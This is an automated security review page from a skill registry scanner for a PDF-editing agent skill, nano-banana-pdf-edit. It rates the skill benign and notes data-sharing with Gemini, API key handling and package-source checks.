Skillv1.0.1

ClawScan security

nano-banana-pdf-edit · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

BenignFeb 21, 2026, 10:03 PM

Verdict: Benign
Confidence: high
Model: gpt-5-mini
Summary: The skill's requirements and runtime instructions are consistent with its stated purpose (using the nano-pdf CLI plus a Gemini Image API key to perform visual PDF edits), but it will send images—and optionally PDF text—to an external model (Gemini), so users should be aware of data-sharing and billing implications.
Guidance: This skill appears coherent for visually editing PDFs, but be aware of these practical concerns before installing or using it: - Data exposure: The tool converts pages to images and sends them (and optionally the PDF text if you enable --use-context) to Google Gemini. Do not use it with sensitive or confidential PDFs unless you accept that data will be sent to Google's API and may be billed. - API key management: Provide a Gemini API key tied to a project with appropriate billing limits. Consider using a restricted/ephemeral key or project to limit blast radius and cost, and revoke it if you suspect misuse. - Verify packages/sources: The skill instructs you to pip install nano-pdf and references GitHub repos. Inspect the nano-pdf package source (PyPI/GitHub) and confirm the repository owner before installing to avoid installing a malicious package. - Test safely: Try the workflow on non-sensitive sample PDFs first to confirm results and costs. - Use options to limit leakage: Use --no-use-context if you do not want the agent to send the full document text as context, and prefer --disable-google-search if you want to avoid additional external lookups. If you want a stricter assessment, provide the exact nano-pdf package source (PyPI page or the GitHub repo contents) so I can inspect the code that will be installed and called.

Review Dimensions

Purpose & Capability: noteThe name, description, and declared requirements (python3 and GEMINI_API_KEY) match the behavior described in SKILL.md: invoking the nano-pdf CLI which uses Gemini Image to edit rendered PDF page images. Minor inconsistency: registry metadata listed source/homepage as unknown/none while SKILL.md/README reference GitHub repos (ps06756/nano-banana-pdf-skill and gavrielc/Nano-PDF). Verify the repository origin before installing.
Instruction Scope: noteSKILL.md stays within the purpose: it instructs the agent to check dependencies, run nano-pdf edit/add commands, and optionally include document context. Important scope note: the workflow converts PDF pages to images and sends them (and, if enabled, full PDF text via --use-context) to an external model (Google Gemini). That is necessary for the feature but means document content is transmitted outside the host system.
Install Mechanism: okThis is an instruction-only skill with no install spec or bundled code. It asks users to install nano-pdf via pip and standard OS packages (poppler, tesseract), which is proportionate and expected. Because installation happens via pip/OS package managers, users should validate the nano-pdf package source (PyPI/GitHub) before installing.
Credentials: okOnly GEMINI_API_KEY is required and declared as primaryEnv, which is appropriate for a skill that calls Google's Gemini API. No unrelated credentials or config paths are requested. Note: the key is described as a paid API key—expect billing for image generation and verify API key project/permissions.
Persistence & Privilege: okThe skill does not request always: true or any elevated persistence. It is user-invocable and uses the platform default for autonomous invocation; that is expected for skills. It does not request to modify other skills or system-wide configs.